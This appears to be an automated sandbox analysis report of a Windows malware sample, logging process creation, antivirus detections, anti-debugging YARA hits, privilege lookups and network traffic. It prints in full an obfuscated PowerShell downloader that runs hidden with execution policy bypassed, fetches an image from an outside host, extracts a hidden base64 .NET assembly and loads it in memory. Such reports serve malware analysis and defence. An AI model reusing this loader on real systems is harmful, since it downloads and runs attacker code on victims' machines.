cmdline	powershell -command $Codigo = 'LgAgACgAIAAkAFAAUwBoAE8ATQBlAFsANABdACsAJABwAFMASABvAG0AZQBbADMANABdACsAJwBYACcAKQAgACgAIAAoACgAJwB7ADEAfQBpAG0AYQAnACsAJwBnAGUAVQByAGwAIAA9ACAAewAwAH0AaAB0AHQAcABzADoALwAvAHUAcABsAG8AYQBkAGQAZQBpAG0AYQBnAGUAbgBzAC4AYwBvAG0ALgBiAHIALwBpAG0AYQBnAGUAcwAvADAAMAA0AC8ANgA2ADcALwA2ADAAOAAvAG8AJwArACcAcgBpAGcAaQBuAGEAbAAvAGgAdABhAC4AagBwAGcAPwAxADcAMAAwADIANgA4ADgANAAwAHsAMAB9ADsAewAxAH0AdwBlAGIAQwBsAGkAZQBuAHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7AHsAMQB9AGkAbQBhAGcAJwArACcAZQBCAHkAdABlAHMAIAA9ACAAewAxAH0AdwBlAGIAQwBsAGkAZQBuAHQALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoAHsAMQB9AGkAbQBhAGcAZQBVAHIAJwArACcAbAApADsAewAxAH0AaQBtAGEAZwBlAFQAZQB4AHQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAewAxAH0AaQBtAGEAZwBlAEIAeQAnACsAJwB0AGUAcwApADsAewAxAH0AcwB0AGEAcgB0AEYAbABhAGcAIAA9ACAAewAwAH0APAAnACsAJwA8AEIAQQBTAEUANgA0AF8AUwBUAEEAJwArACcAUgBUAD4APgB7ADAAfQA7AHsAMQB9AGUAbgBkAEYAbABhAGcAIAA9ACAAewAwAH0APAA8AEIAQQBTAEUANgA0AF8ARQBOAEQAPgA+AHsAMAB9ADsAewAxAH0AcwB0AGEAcgB0AEkAbgBkAGUAeAAgAD0AIAB7ADEAfQBpAG0AYQBnAGUAVABlAHgAdAAuAEkAbgBkAGUAeABPAGYAKAB7ADEAfQBzAHQAYQByAHQARgBsAGEAZwApADsAewAxAH0AZQBuAGQASQBuAGQAZQB4ACAAPQAgAHsAMQB9AGkAbQBhAGcAZQBUAGUAeAB0AC4ASQBuAGQAZQB4AE8AZgAoAHsAMQB9AGUAbgBkAEYAbABhAGcAKQA7AHsAMQB9AHMAdABhAHIAdABJAG4AZABlAHgAIAAtAGcAZQAgADAAIAAtAGEAbgBkACAAewAxAH0AZQBuAGQASQBuAGQAZQB4ACAALQBnAHQAIAB7ADEAfQBzAHQAYQByAHQASQBuAGQAZQB4ADsAewAxAH0AcwB0AGEAcgB0AEkAbgBkAGUAeAAgACsAPQAgACcAKwAnAHsAMQB9AHMAdABhAHIAdABGAGwAYQBnAC4ATABlAG4AZwB0AGgAOwB7ADEAfQBiAGEAcwBlADYANABMAGUAbgBnAHQAaAAgAD0AIAB7ADEAfQBlAG4AZABJAG4AZABlAHgAIAAtACAAewAxAH0AcwB0AGEAcgB0AEkAbgBkAGUAeAA7AHsAMQB9AGIAYQAnACsAJwBzAGUANgA0AEMAbwBtAG0AYQBuAGQAIAA9ACAAewAxAH0AaQBtACcAKwAnAGEAZwBlAFQAZQB4AHQAJwArACcALgAnACsAJwBTAHUAYgBzAHQAcgBpAG4AZwAoAHsAMQB9AHMAdABhAHIAdABJAG4AZABlAHgALAAgAHsAMQB9AGIAYQBzAGUANgA0AEwAZQAnACsAJwBuAGcAdABoACkAOwB7ADEAfQAnACsAJwBjACcAKwAnAG8AbQBtAGEAbgBkAEIAeQB0AGUAcwAgAD0AIABbAFMAJwArACcAeQBzAHQAZQAnACsAJwBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAewAxAH0AYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAApADsAewAxAH0AbABvAGEAZABlAGQAQQBzAHMAZQBtAGIAbAB5ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKAB7ADEAfQBjAG8AbQBtAGEAbgBkAEIAeQB0AGUAcwApADsAewAxAH0AdAB5AHAAZQAgAD0AIAB7ADEAfQBsAG8AYQBkAGUAZABBAHMAcwBlAG0AYgBsAHkALgBHAGUAdABUAHkAcABlACgAewAwAH0ARgBpAGIAZQByAC4ASABvAG0AZQB7ADAAfQApADsAewAxAH0AbQBlAHQAaABvAGQAIAA9ACAAewAxAH0AdAB5AHAAZQAuAEcAZQB0AE0AZQB0AGgAbwBkACgAewAwAH0AVgBBAEkAewAwAH0AKQAuAEkAbgB2AG8AawBlACgAewAxAH0AbgB1AGwAbAAsACAAWwBvAGIAagBlAGMAdABbAF0AXQAgACgAewAwAH0AZABIAGgAMABMAG0AdABqAGEAWABCAG8AZABHACcAKwAnADkAdgBkAEMAOAB3AE0AegBFAHUATwBEAFEAeQBMAGoASQA1AEwAagBFADUATAB5ADgANgBjAEgAUgAwAGEAQQA9AD0AewAwAH0AIAAsACAAewAwAH0AZABmAGQAZgBkAHsAMAAnACsAJwB9ACAALAAgAHsAMAB9AGQAZgBkAGYAewAwAH0AIAAsACAAewAwAH0AZAAnACsAJwBmAGQAZgB7ADAAfQAgACwAIAB7ADAAJwArACcAfQBkAGEAZABzAGEAewAwAH0AIAAsACAAewAwAH0AZABlAHsAMAB9ACAALAAgAHsAMAB9AGMAdQB7ADAAfQApACkAJwApACAALQBGACAAIABbAGMASABBAFIAXQAzADkALABbAGMASABBAFIAXQAzADYAKQApAA==';$OWjuxd = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD

A process created a hidden window (3 events)

Time & API	Arguments	Status	Return
CreateProcessInternalW Nov. 28, 2023, 9:54 a.m.	thread_identifier: 1472 thread_handle: 0x00000000000004ec process_identifier: 1220 current_directory: C:\Users\test22\Desktop filepath: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe track: 1 command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LgAgACgAIAAkAFAAUwBoAE8ATQBlAFsANABdACsAJABwAFMASABvAG0AZQBbADMANABdACsAJwBYACcAKQAgACgAIAAoACgAJwB7ADEAfQBpAG0AYQAnACsAJwBnAGUAVQByAGwAIAA9ACAAewAwAH0AaAB0AHQAcABzADoALwAvAHUAcABsAG8AYQBkAGQAZQBpAG0AYQBnAGUAbgBzAC4AYwBvAG0ALgBiAHIALwBpAG0AYQBnAGUAcwAvADAAMAA0AC8ANgA2ADcALwA2ADAAOAAvAG8AJwArACcAcgBpAGcAaQBuAGEAbAAvAGgAdABhAC4AagBwAGcAPwAxADcAMAAwADIANgA4ADgANAAwAHsAMAB9ADsAewAxAH0AdwBlAGIAQwBsAGkAZQBuAHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7AHsAMQB9AGkAbQBhAGcAJwArACcAZQBCAHkAdABlAHMAIAA9ACAAewAxAH0AdwBlAGIAQwBsAGkAZQBuAHQALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoAHsAMQB9AGkAbQBhAGcAZQBVAHIAJwArACcAbAApADsAewAxAH0AaQBtAGEAZwBlAFQAZQB4AHQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAewAxAH0AaQBtAGEAZwBlAEIAeQAnACsAJwB0AGUAcwApADsAewAxAH0AcwB0AGEAcgB0AEYAbABhAGcAIAA9ACAAewAwAH0APAAnACsAJwA8AEIAQQBTAEUANgA0AF8AUwBUAEEAJwArACcAUgBUAD4APgB7ADAAfQA7AHsAMQB9AGUAbgBkAEYAbABhAGcAIAA9ACAAewAwAH0APAA8AEIAQQBTAEUANgA0AF8ARQBOAEQAPgA+AHsAMAB9ADsAewAxAH0AcwB0AGEAcgB0AEkAbgBkAGUAeAAgAD0AIAB7ADEAfQBpAG0AYQBnAGUAVABlAHgAdAAuAEkAbgBkAGUAeABPAGYAKAB7ADEAfQBzAHQAYQByAHQARgBsAGEAZwApADsAewAxAH0AZQBuAGQASQBuAGQAZQB4ACAAPQAgAHsAMQB9AGkAbQBhAGcAZQBUAGUAeAB0AC4ASQBuAGQAZQB4AE8AZgAoAHsAMQB9AGUAbgBkAEYAbABhAGcAKQA7AHsAMQB9AHMAdABhAHIAdABJAG4AZABlAHgAIAAtAGcAZQAgADAAIAAtAGEAbgBkACAAewAxAH0AZQBuAGQASQBuAGQAZQB4ACAALQBnAHQAIAB7ADEAfQBzAHQAYQByAHQASQBuAGQAZQB4ADsAewAxAH0AcwB0AGEAcgB0AEkAbgBkAGUAeAAgACsAPQAgACcAKwAnAHsAMQB9AHMAdABhAHIAdABGAGwAYQBnAC4ATABlAG4AZwB0AGgAOwB7ADEAfQBiAGEAcwBlADYANABMAGUAbgBnAHQAaAAgAD0AIAB7ADEAfQBlAG4AZABJAG4AZABlAHgAIAAtACAAewAxAH0AcwB0AGEAcgB0AEkAbgBkAGUAeAA7AHsAMQB9AGIAYQAnACsAJwBzAGUANgA0AEMAbwBtAG0AYQBuAGQAIAA9ACAAewAxAH0AaQBtACcAKwAnAGEAZwBlAFQAZQB4AHQAJwArACcALgAnACsAJwBTAHUAYgBzAHQAcgBpAG4AZwAoAHsAMQB9AHMAdABhAHIAdABJAG4AZABlAHgALAAgAHsAMQB9AGIAYQBzAGUANgA0AEwAZQAnACsAJwBuAGcAdABoACkAOwB7ADEAfQAnACsAJwBjACcAKwAnAG8AbQBtAGEAbgBkAEIAeQB0AGUAcwAgAD0AIABbAFMAJwArACcAeQBzAHQAZQAnACsAJwBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAewAxAH0AYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAApADsAewAxAH0AbABvAGEAZABlAGQAQQBzAHMAZQBtAGIAbAB5ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKAB7ADEAfQBjAG8AbQBtAGEAbgBkAEIAeQB0AGUAcwApADsAewAxAH0AdAB5AHAAZQAgAD0AIAB7ADEAfQBsAG8AYQBkAGUAZABBAHMAcwBlAG0AYgBsAHkALgBHAGUAdABUAHkAcABlACgAewAwAH0ARgBpAGIAZQByAC4ASABvAG0AZQB7ADAAfQApADsAewAxAH0AbQBlAHQAaABvAGQAIAA9ACAAewAxAH0AdAB5AHAAZQAuAEcAZQB0AE0AZQB0AGgAbwBkACgAewAwAH0AVgBBAEkAewAwAH0AKQAuAEkAbgB2AG8AawBlACgAewAxAH0AbgB1AGwAbAAsACAAWwBvAGIAagBlAGMAdABbAF0AXQAgACgAewAwAH0AZABIAGgAMABMAG0AdABqAGEAWABCAG8AZABHACcAKwAnADkAdgBkAEMAOAB3AE0AegBFAHUATwBEAFEAeQBMAGoASQA1AEwAagBFADUATAB5ADgANgBjAEgAUgAwAGEAQQA9AD0AewAwAH0AIAAsACAAewAwAH0AZABmAGQAZgBkAHsAMAAnACsAJwB9ACAALAAgAHsAMAB9AGQAZgBkAGYAewAwAH0AIAAsACAAewAwAH0AZAAnACsAJwBmAGQAZgB7ADAAfQAgACwAIAB7ADAAJwArACcAfQBkAGEAZABzAGEAewAwAH0AIAAsACAAewAwAH0AZABlAHsAMAB9ACAALAAgAHsAMAB9AGMAdQB7ADAAfQApACkAJwApACAALQBGACAAIABbAGMASABBAFIAXQAzADkALABbAGMASABBAFIAXQAzADYAKQApAA==';$OWjuxd = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD filepath_r: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe stack_pivoted: 0 creation_flags: 67634192 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x00000000000004e4	1	1
ShellExecuteExW Nov. 28, 2023, 9:54 a.m.	show_type: 0 filepath_r: powershell parameters: -command $Codigo = 'LgAgACgAIAAkAFAAUwBoAE8ATQBlAFsANABdACsAJABwAFMASABvAG0AZQBbADMANABdACsAJwBYACcAKQAgACgAIAAoACgAJwB7ADEAfQBpAG0AYQAnACsAJwBnAGUAVQByAGwAIAA9ACAAewAwAH0AaAB0AHQAcABzADoALwAvAHUAcABsAG8AYQBkAGQAZQBpAG0AYQBnAGUAbgBzAC4AYwBvAG0ALgBiAHIALwBpAG0AYQBnAGUAcwAvADAAMAA0AC8ANgA2ADcALwA2ADAAOAAvAG8AJwArACcAcgBpAGcAaQBuAGEAbAAvAGgAdABhAC4AagBwAGcAPwAxADcAMAAwADIANgA4ADgANAAwAHsAMAB9ADsAewAxAH0AdwBlAGIAQwBsAGkAZQBuAHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7AHsAMQB9AGkAbQBhAGcAJwArACcAZQBCAHkAdABlAHMAIAA9ACAAewAxAH0AdwBlAGIAQwBsAGkAZQBuAHQALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoAHsAMQB9AGkAbQBhAGcAZQBVAHIAJwArACcAbAApADsAewAxAH0AaQBtAGEAZwBlAFQAZQB4AHQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAewAxAH0AaQBtAGEAZwBlAEIAeQAnACsAJwB0AGUAcwApADsAewAxAH0AcwB0AGEAcgB0AEYAbABhAGcAIAA9ACAAewAwAH0APAAnACsAJwA8AEIAQQBTAEUANgA0AF8AUwBUAEEAJwArACcAUgBUAD4APgB7ADAAfQA7AHsAMQB9AGUAbgBkAEYAbABhAGcAIAA9ACAAewAwAH0APAA8AEIAQQBTAEUANgA0AF8ARQBOAEQAPgA+AHsAMAB9ADsAewAxAH0AcwB0AGEAcgB0AEkAbgBkAGUAeAAgAD0AIAB7ADEAfQBpAG0AYQBnAGUAVABlAHgAdAAuAEkAbgBkAGUAeABPAGYAKAB7ADEAfQBzAHQAYQByAHQARgBsAGEAZwApADsAewAxAH0AZQBuAGQASQBuAGQAZQB4ACAAPQAgAHsAMQB9AGkAbQBhAGcAZQBUAGUAeAB0AC4ASQBuAGQAZQB4AE8AZgAoAHsAMQB9AGUAbgBkAEYAbABhAGcAKQA7AHsAMQB9AHMAdABhAHIAdABJAG4AZABlAHgAIAAtAGcAZQAgADAAIAAtAGEAbgBkACAAewAxAH0AZQBuAGQASQBuAGQAZQB4ACAALQBnAHQAIAB7ADEAfQBzAHQAYQByAHQASQBuAGQAZQB4ADsAewAxAH0AcwB0AGEAcgB0AEkAbgBkAGUAeAAgACsAPQAgACcAKwAnAHsAMQB9AHMAdABhAHIAdABGAGwAYQBnAC4ATABlAG4AZwB0AGgAOwB7ADEAfQBiAGEAcwBlADYANABMAGUAbgBnAHQAaAAgAD0AIAB7ADEAfQBlAG4AZABJAG4AZABlAHgAIAAtACAAewAxAH0AcwB0AGEAcgB0AEkAbgBkAGUAeAA7AHsAMQB9AGIAYQAnACsAJwBzAGUANgA0AEMAbwBtAG0AYQBuAGQAIAA9ACAAewAxAH0AaQBtACcAKwAnAGEAZwBlAFQAZQB4AHQAJwArACcALgAnACsAJwBTAHUAYgBzAHQAcgBpAG4AZwAoAHsAMQB9AHMAdABhAHIAdABJAG4AZABlAHgALAAgAHsAMQB9AGIAYQBzAGUANgA0AEwAZQAnACsAJwBuAGcAdABoACkAOwB7ADEAfQAnACsAJwBjACcAKwAnAG8AbQBtAGEAbgBkAEIAeQB0AGUAcwAgAD0AIABbAFMAJwArACcAeQBzAHQAZQAnACsAJwBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAewAxAH0AYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAApADsAewAxAH0AbABvAGEAZABlAGQAQQBzAHMAZQBtAGIAbAB5ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKAB7ADEAfQBjAG8AbQBtAGEAbgBkAEIAeQB0AGUAcwApADsAewAxAH0AdAB5AHAAZQAgAD0AIAB7ADEAfQBsAG8AYQBkAGUAZABBAHMAcwBlAG0AYgBsAHkALgBHAGUAdABUAHkAcABlACgAewAwAH0ARgBpAGIAZQByAC4ASABvAG0AZQB7ADAAfQApADsAewAxAH0AbQBlAHQAaABvAGQAIAA9ACAAewAxAH0AdAB5AHAAZQAuAEcAZQB0AE0AZQB0AGgAbwBkACgAewAwAH0AVgBBAEkAewAwAH0AKQAuAEkAbgB2AG8AawBlACgAewAxAH0AbgB1AGwAbAAsACAAWwBvAGIAagBlAGMAdABbAF0AXQAgACgAewAwAH0AZABIAGgAMABMAG0AdABqAGEAWABCAG8AZABHACcAKwAnADkAdgBkAEMAOAB3AE0AegBFAHUATwBEAFEAeQBMAGoASQA1AEwAagBFADUATAB5ADgANgBjAEgAUgAwAGEAQQA9AD0AewAwAH0AIAAsACAAewAwAH0AZABmAGQAZgBkAHsAMAAnACsAJwB9ACAALAAgAHsAMAB9AGQAZgBkAGYAewAwAH0AIAAsACAAewAwAH0AZAAnACsAJwBmAGQAZgB7ADAAfQAgACwAIAB7ADAAJwArACcAfQBkAGEAZABzAGEAewAwAH0AIAAsACAAewAwAH0AZABlAHsAMAB9ACAALAAgAHsAMAB9AGMAdQB7ADAAfQApACkAJwApACAALQBGACAAIABbAGMASABBAFIAXQAzADkALABbAGMASABBAFIAXQAzADYAKQApAA==';$OWjuxd = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD filepath: powershell	1	1
CreateProcessInternalW Nov. 28, 2023, 9:48 a.m.	thread_identifier: 908 thread_handle: 0x0000000000000340 process_identifier: 2164 current_directory: C:\Users\test22\Desktop filepath: track: 1 command_line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ". ( $PShOMe[4]+$pSHome[34]+'X') ( (('{1}ima'+'geUrl = {0}https://uploaddeimagens.com.br/images/004/667/608/o'+'riginal/hta.jpg?1700268840{0};{1}webClient = New-Object System.Net.WebClient;{1}imag'+'eBytes = {1}webClient.DownloadData({1}imageUr'+'l);{1}imageText = [System.Text.Encoding]::UTF8.GetString({1}imageBy'+'tes);{1}startFlag = {0}<'+'<BASE64_STA'+'RT>>{0};{1}endFlag = {0}<<BASE64_END>>{0};{1}startIndex = {1}imageText.IndexOf({1}startFlag);{1}endIndex = {1}imageText.IndexOf({1}endFlag);{1}startIndex -ge 0 -and {1}endIndex -gt {1}startIndex;{1}startIndex += '+'{1}startFlag.Length;{1}base64Length = {1}endIndex - {1}startIndex;{1}ba'+'se64Command = {1}im'+'ageText'+'.'+'Substring({1}startIndex, {1}base64Le'+'ngth);{1}'+'c'+'ommandBytes = [S'+'yste'+'m.Convert]::FromBase64String({1}base64Command);{1}loadedAssembly = [System.Reflection.Assembly]::Load({1}commandBytes);{1}type = {1}loadedAssembly.GetType({0}Fiber.Home{0});{1}method = {1}type.GetMethod({0}VAI{0}).Invoke({1}null, [object[]] ({0}dHh0LmtjaXBodG'+'9vdC8wMzEuODQyLjI5LjE5Ly86cHR0aA=={0} , {0}dfdfd{0'+'} , {0}dfdf{0} , {0}d'+'fdf{0} , {0'+'}dadsa{0} , {0}de{0} , {0}cu{0}))') -F [cHAR]39,[cHAR]36))" filepath_r: stack_pivoted: 0 creation_flags: 0 () inherit_handles: 1 process_handle: 0x00000000000003c4	1	1

File has been identified by 4 AntiVirus engines on VirusTotal as malicious (4 events)

Symantec	CL.Downloader!gen11
Kaspersky	HEUR:Trojan.Script.Generic
Google	Detected
Ikarus	Trojan.VBS.Agent

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses Nov. 28, 2023, 9:48 a.m.	flags: 15 family: 0		111	0

URL downloaded by powershell script (11 events)

Data received	[
Data received	Wee:§ä÷ô¡ãL:wÀ]ç«^ýXDOWNGRD eKIûÕáñ,ßÊÀq'UË&#9Ò±O9±¼À ÿ
Data received	Q
Data received
Data received	AO.Ýô,%ARÕÞØgï¢2PîÃÿ@Hq¨YÈmq;ÆÎú)ÜC©>×Ø%Ã%ÁYö Nñ!¸ÓíG0E 7N:Ø÷ãfþ+E¥?"[ ÷µúoyë.R&!ûbßJÁùçEgþÐC.8i?2,`Q±Þ«d½
Data received
Data received
Data received
Data received
Data received	0
Data received	Ì¸=ØUqÃ"[;ÐVÌýîøâ7L,y}æWÕy¤¦ábÁ¥

Poweshell is sending data to a remote host (2 events)

Data sent	yuee:§ZAbh]ë+©÷x_Rí9Ïã4V/5 ÀÀÀ À 284ÿuploaddeimagens.com.br
Data sent	FBAm¤ùN#òl5$©§PíÃU"¥f»þÚ-+²äKLX%Àõ:ùç]?ô RCÅª$¯>BÅ0cæÐE\íY½£niH+Ò4Gâß×ÐÃMèy« ×Ó- ÞÚ¼a)_

Checks for the Locally Unique Identifier on the system for a suspicious privilege (2 events)

Time & API	Arguments	Status	Return	Repeated
LookupPrivilegeValueW Nov. 28, 2023, 9:48 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0
LookupPrivilegeValueW Nov. 28, 2023, 9:48 a.m.	system_name: privilege_name: SeDebugPrivilege	1	1	0

Yara rule detected in process memory (8 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Uses Windows utilities for basic Windows functionality (1 event)

cmdline

"C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:2172 CREDAT:145409

Communicates with host for which no DNS query was performed (1 event)

host

117.18.232.200

A command shell or script process was created by an unexpected parent process (1 event)

parent_process

iexplore.exe

martian_process

powershell -command $Codigo = 'LgAgACgAIAAkAFAAUwBoAE8ATQBlAFsANABdACsAJABwAFMASABvAG0AZQBbADMANABdACsAJwBYACcAKQAgACgAIAAoACgAJwB7ADEAfQBpAG0AYQAnACsAJwBnAGUAVQByAGwAIAA9ACAAewAwAH0AaAB0AHQAcABzADoALwAvAHUAcABsAG8AYQBkAGQAZQBpAG0AYQBnAGUAbgBzAC4AYwBvAG0ALgBiAHIALwBpAG0AYQBnAGUAcwAvADAAMAA0AC8ANgA2ADcALwA2ADAAOAAvAG8AJwArACcAcgBpAGcAaQBuAGEAbAAvAGgAdABhAC4AagBwAGcAPwAxADcAMAAwADIANgA4ADgANAAwAHsAMAB9ADsAewAxAH0AdwBlAGIAQwBsAGkAZQBuAHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7AHsAMQB9AGkAbQBhAGcAJwArACcAZQBCAHkAdABlAHMAIAA9ACAAewAxAH0AdwBlAGIAQwBsAGkAZQBuAHQALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoAHsAMQB9AGkAbQBhAGcAZQBVAHIAJwArACcAbAApADsAewAxAH0AaQBtAGEAZwBlAFQAZQB4AHQAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAewAxAH0AaQBtAGEAZwBlAEIAeQAnACsAJwB0AGUAcwApADsAewAxAH0AcwB0AGEAcgB0AEYAbABhAGcAIAA9ACAAewAwAH0APAAnACsAJwA8AEIAQQBTAEUANgA0AF8AUwBUAEEAJwArACcAUgBUAD4APgB7ADAAfQA7AHsAMQB9AGUAbgBkAEYAbABhAGcAIAA9ACAAewAwAH0APAA8AEIAQQBTAEUANgA0AF8ARQBOAEQAPgA+AHsAMAB9ADsAewAxAH0AcwB0AGEAcgB0AEkAbgBkAGUAeAAgAD0AIAB7ADEAfQBpAG0AYQBnAGUAVABlAHgAdAAuAEkAbgBkAGUAeABPAGYAKAB7ADEAfQBzAHQAYQByAHQARgBsAGEAZwApADsAewAxAH0AZQBuAGQASQBuAGQAZQB4ACAAPQAgAHsAMQB9AGkAbQBhAGcAZQBUAGUAeAB0AC4ASQBuAGQAZQB4AE8AZgAoAHsAMQB9AGUAbgBkAEYAbABhAGcAKQA7AHsAMQB9AHMAdABhAHIAdABJAG4AZABlAHgAIAAtAGcAZQAgADAAIAAtAGEAbgBkACAAewAxAH0AZQBuAGQASQBuAGQAZQB4ACAALQBnAHQAIAB7ADEAfQBzAHQAYQByAHQASQBuAGQAZQB4ADsAewAxAH0AcwB0AGEAcgB0AEkAbgBkAGUAeAAgACsAPQAgACcAKwAnAHsAMQB9AHMAdABhAHIAdABGAGwAYQBnAC4ATABlAG4AZwB0AGgAOwB7ADEAfQBiAGEAcwBlADYANABMAGUAbgBnAHQAaAAgAD0AIAB7ADEAfQBlAG4AZABJAG4AZABlAHgAIAAtACAAewAxAH0AcwB0AGEAcgB0AEkAbgBkAGUAeAA7AHsAMQB9AGIAYQAnACsAJwBzAGUANgA0AEMAbwBtAG0AYQBuAGQAIAA9ACAAewAxAH0AaQBtACcAKwAnAGEAZwBlAFQAZQB4AHQAJwArACcALgAnACsAJwBTAHUAYgBzAHQAcgBpAG4AZwAoAHsAMQB9AHMAdABhAHIAdABJAG4AZABlAHgALAAgAHsAMQB9AGIAYQBzAGUANgA0AEwAZQAnACsAJwBuAGcAdABoACkAOwB7ADEAfQAnACsAJwBjACcAKwAnAG8AbQBtAGEAbgBkAEIAeQB0AGUAcwAgAD0AIABbAFMAJwArACcAeQBzAHQAZQAnACsAJwBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAewAxAH0AYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAApADsAewAxAH0AbABvAGEAZABlAGQAQQBzAHMAZQBtAGIAbAB5ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKAB7ADEAfQBjAG8AbQBtAGEAbgBkAEIAeQB0AGUAcwApADsAewAxAH0AdAB5AHAAZQAgAD0AIAB7ADEAfQBsAG8AYQBkAGUAZABBAHMAcwBlAG0AYgBsAHkALgBHAGUAdABUAHkAcABlACgAewAwAH0ARgBpAGIAZQByAC4ASABvAG0AZQB7ADAAfQApADsAewAxAH0AbQBlAHQAaABvAGQAIAA9ACAAewAxAH0AdAB5AHAAZQAuAEcAZQB0AE0AZQB0AGgAbwBkACgAewAwAH0AVgBBAEkAewAwAH0AKQAuAEkAbgB2AG8AawBlACgAewAxAH0AbgB1AGwAbAAsACAAWwBvAGIAagBlAGMAdABbAF0AXQAgACgAewAwAH0AZABIAGgAMABMAG0AdABqAGEAWABCAG8AZABHACcAKwAnADkAdgBkAEMAOAB3AE0AegBFAHUATwBEAFEAeQBMAGoASQA1AEwAagBFADUATAB5ADgANgBjAEgAUgAwAGEAQQA9AD0AewAwAH0AIAAsACAAewAwAH0AZABmAGQAZgBkAHsAMAAnACsAJwB9ACAALAAgAHsAMAB9AGQAZgBkAGYAewAwAH0AIAAsACAAewAwAH0AZAAnACsAJwBmAGQAZgB7ADAAfQAgACwAIAB7ADAAJwArACcAfQBkAGEAZABzAGEAewAwAH0AIAAsACAAewAwAH0AZABlAHsAMAB9ACAALAAgAHsAMAB9AGMAdQB7ADAAfQApACkAJwApACAALQBGACAAIABbAGMASABBAFIAXQAzADkALABbAGMASABBAFIAXQAzADYAKQApAA==';$OWjuxd = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $codigo ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD

Network communications indicative of a potential document or script payload download was initiated by the process powershell.exe (3 events)

Time & API	Arguments	Status	Return
send Nov. 28, 2023, 9:48 a.m.	buffer: yuee:§ZAbh]ë+©÷x_Rí9Ïã4V/5 ÀÀÀ À 284ÿuploaddeimagens.com.br socket: 1224 sent: 126	1	126
